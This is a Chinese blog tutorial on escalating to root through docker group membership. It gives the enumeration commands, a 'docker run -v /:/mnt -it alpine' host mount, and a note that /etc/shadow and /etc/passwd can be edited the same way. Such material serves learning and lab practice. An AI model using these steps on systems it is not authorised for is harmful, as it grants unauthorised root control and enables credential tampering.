Docker提权

已于 2024-09-22 11:54:35 修改
阅读量1k 收藏 15
点赞数
分类专栏: Linux提权 文章标签: docker 容器 运维 网络安全
于 2024-09-22 11:52:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68636078/article/details/142432091
版权

简介:

  • Docker 需要 root 权限:Docker 容器需要较高的权限(root 权限)才能在系统中创建、运行和管理容器。这是因为 Docker 本质上是虚拟化技术,它需要访问底层的系统资源,诸如网络、文件系统等,才能运行和隔离容器。

  • docker 组的用户拥有类似 root 权限

    • Docker 的守护进程(daemon)运行在系统的后台,它是以 root 用户权限运行的。
    • 如果某个用户被添加到了 docker 用户组中,该用户可以运行 Docker 命令(如 docker run 等),即使他不是 root 用户。
    • 关键点:由于 Docker 的守护进程会以 root 权限执行这些命令,拥有 Docker 组权限的用户实际上也获得了类似于 root 的访问权限,因为他们可以通过 Docker 间接执行具有 root 权限的操作,而不需要输入 root 用户的密码。

总结:如果一个用户被添加到 docker 组,就意味着他能够像 root 用户一样管理 Docker 容器和底层系统资源,尽管他不需要输入 root 的密码。这给系统安全带来了一定的隐患。拥有 docker 组权限的用户相当于拥有 root 权限的能力。

用法:

1、查看是否有docker组 

2、查看当前获取到的普通用户是否在docker组里面

3、查看容器,如果在,创建一个容器,

4、将容器内的 /mnt 目录将反映宿主机 /root 目录中的内容

5、也可以挂载/etc,对shadow和passwd文件进行操作

命令:

# 查看是否有 docker 组
getent group docker

# 查看docker组成员
cat /etc/group | grep docker

# 查看容器
docker images

# 挂载
docker run -v /root:/mnt it alphine

参数:

-v /root:/mnt:这个参数用于挂载卷(volume)。它的意思是将宿主机的 /root 目录挂载到容器内的 /mnt 目录。这意味着容器内的 /mnt 目录将反映宿主机 /root 目录中的内容。

it:运行命令后直接进入交互式shell界面,而不是让这个实例在后台运行。

alpine: 这是要运行的 Docker 镜像的名称。

案例:

1、查看是否有docker组 

getent group docker

2、查看当前获取到的普通用户是否在docker组里面

cat /etc/group | grep docker

3、查看容器

docker images

4、挂载

docker run -v /:/mnt -it alpine

5、提权

cd /mnt/root
cat ./root.txt

注意:将/挂载到/mnt下,所以想要进入root必需从/mnt/root下进入

参考文献:

一种通用的Docker提权方式 (360doc.com)

可乐葡萄糖
关注
专栏目录
实战Docker未授权访问提权
失心少年
12-04 938
docker未授权访问提权
OSCP-Peppo(ssh用户密码相同、受限制的bash环境、docker提权
墨痕诉清风的博客
04-22 216
端口10000报告它正在用户'eleanor'下运行。试过暴力破解用户名,但没有成功,可以在SSH上登录 eleanor:elenaor。运行上述命令后,可以导出一个新的路径,然后生成一个python shell,然后再次导出该路径,以便在shell会话上具有完整的功能。被锁定在一个受限制的bash shell。查看的命令可用性. 可以看到我们可以访问哪些二进制文件。以标识哪些服务在哪个用户下运行。显示是Docker组的成员。上面列出的图像之一。
docker提权
Longwaer
01-01 3523
通过靶场实验环境,更加深入了解docker提权原理及使用方法,提升个人对linux提权方法的掌握及运用。
linux定时任务打包提权&docker提权
m0_62207170的博客
03-03 710
linux定时任务打包提权&docker提权
Linux提权Docker组挂载 && Rsync未授权 && Sudo-CVE && Polkit-CVE
qq_61553520的博客
01-28 812
这里的提权手法是需要有一个普通用户的权限,一般情况下取得的webshell权限可能不够。
linux~Docker容器提权
@小张小张的博客
11-06 4911
Docker容器的特点: 1.轻量级 在机器上运行的Docker容器共享该机器的操作系统内核; 他们使用更少的计算和内存。图像由文件系统层构建并共享公用文件。最大限度地减少了磁盘使用量。 2.标准 Docker容器基于开放标准,可在Linux发行版,Microsoft Windows以及任何基础架构(包括虚拟机,裸机)上运行。 3.安全 Docker容器将应用程序彼此隔离并从底层基础架构中分离出来。提供了最强大的默认隔离功能,可以将应用程序问题限制在一个容器中,而不是整个机器上。 关于docker提权
docker提权靶场
08-17
Docker提权靶场是用于测试和演练Docker容器安全的环境。它模拟了一些常见的Docker容器提权漏洞,并提供了一系列挑战,供安全研究人员和渗透测试专家进行实践和学习。 在Docker提权靶场中,你可以尝试利用各种漏洞和...
docker容器有个bug-非root用户提权
m0_67402235的博客
06-02 358
本系列之前的文章中使用root用户安装docker,并在root用户下启动docker守护进程,容器也是在root用户下启动运行的。那么问题就出现了:我们的容器服务进程都是root用户权限,使用数据卷的方式想挂载哪个目录就挂载那个目录;想修改挂载目录下的哪个文件,就修改哪个文件。 那么我们本文带大家使用非root用户来启动docker容器,是否就安全了呢? 我们先不说答案,让我们一起来通过实验,来解答我们的疑问。为了提升安全性,我们考虑一种方案:使用非root用户启动docker容器。为此我们做一个实验,首
docker系列】容器有个bug-非root用户提权
m0_67390963的博客
06-18 754
本系列之前的文章中使用root用户安装docker,并在root用户下启动docker守护进程,容器也是在root用户下启动运行的。那么问题就出现了:我们的容器服务进程都是root用户权限,使用数据卷的方式想挂载哪个目录就挂载那个目录;想修改挂载目录下的哪个文件,就修改哪个文件。 那么我们本文带大家使用非root用户来启动docker容器,是否就安全了呢? 我们先不说答案,让我们一起来通过实验,来解答我们的疑问。为了提升安全性,我们考虑一种方案:使用非root用户启动docker容器。为此我们做一个实验,首
Linux 提权- Docker 容器详解
最新发布
民工哥的博客
07-03 148
戳下方名片,关注并星标!回复“1024”获取2TB学习资源!????体系化学习:运维工程师打怪升级进阶之路 4.0— 特色专栏—MySQL/PostgreSQL/MongoDBElasticSearch/Hadoop/RedisKubernetes/Docker/DevOpsKafka/RabbitMQ/Zookeeper监控平台/应用与服务/集群管理N...
关于Linux环境下的LXD及Docker提权
qq_46081990的博客
03-22 1795
Docker是一个开源的容器化平台,它建立在LXC之上,并提供了一套更高级别的工具和API,使得容器的构建、分发和运行变得更加简单。LXD主要面向系统级容器,可以运行完整的操作系统镜像,并提供类似于虚拟机的环境。上述提权方案只是对宿主机目录有了操作权限,如果此时反弹 shell 得到的权限将是容器内的 root 权限,而非宿主机的 root 权限,显然不是我们想要的。拉取镜像,创建容器,将宿主机的根目录 "/" 挂载到容器中的 "/mnt" 目录,进入 /mnt/root 目录查看便可得到 flag`
docker用户组提权
Vicl1fe的博客
12-23 2410
关于docker提权 如果一个服务器有一个普通的用户,并且这个用户加入了docker组,则这个用户已经是root了。下面看具体操作 我创了一个用户,并且加入了docker组。 docker 组内用户执行命令的时候会自动在所有命令前添加 sudo。因为设计或者其他的原因,Docker 给予所有 docker 组的用户相当大的权力(虽然权力只体现在能访问 /var/run/docker.sock ...
docker容器内的恶意提权
niwoxiangyu的博客
10-17 126
使用docker in docker 运行一个带有docker二进制文件且挂载了/root/.docker/config.json和/var/run/docker.sock的容器就可以对任意项目任意镜像进行pull\push操作。同时/root/.docker/config.json内harbor的密码是明文的用户名+密码转base64得到的。docker容器内的恶意提权
Docker 安全:通过 Docker 提升权限
weixin_33829657的博客
09-20 539
本文讲的是Docker 安全:通过 Docker 提升权限,【编者的话】本文的目的在于提醒大家注意 Docker 的安全性。本文中所有的内容总结成一句话:某个用户被加入了docker用户组,那么这个用户相当于直接获得了宿主机免认证的root权限。本文中的情况出现的情况比较苛刻,所以大家可以把这篇文章当做一个warning问不是error。...
利用Docker容器的不安全部署获取宿主机权限
weixin_34253539的博客
12-24 507
前言滥用容器( container)及逃逸的方法有多种,本文将讨论最基本的一种,即滥用docker socket来逃逸容器并在宿主机上以root身份执行代码。实验环境设置由于我们将使用容器,因此你必须安装docker。创建网络首先,我们在创建容器的地方创建一个docker网络:docker network create pwnage复制代码启动易受攻击的容器在本示例中,我将使用受SambaCry漏...
脏牛漏洞-Docker逃逸POC(dirtycow-vdso)代码分析
enjoy5512的博客
11-17 7458
脏牛漏洞Docker逃逸POC函数注释
CVE-2020-11492:Docker Windows桌面版权限提升漏洞
systemino的博客
05-26 501
研究人员发现Docker Windows 桌面版存在权限提升漏洞,该漏洞的根源在于Docker Desktop Service,该服务是Docker的主要Windows服务,作为客户端用命名管道来与子进程就行通信。 高权限的Docker Desktop Service可以被诱导来连接到恶意低权限进程建立的命名管道。一旦连接建立,恶意京城就可以伪装成Docker Desktop Service account (SYSTEM)并以最高权限来执行任意系统命令。 该漏洞CVE编号为CVE-2020-11492
Docker普通用户不使用sudo提权
weixin_30666753的博客
04-30 203
解决方法 sudo groupadd docker 添加Docker用户组 sudo gpasswd -a ${USER} docker 添加你的用户到Docker用户组 reboot 重启系统。也可重启Docker服务,注销用户登录。 转载于:https://www.cnblogs.com/zhuxiaoxi/p/8972951.html...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值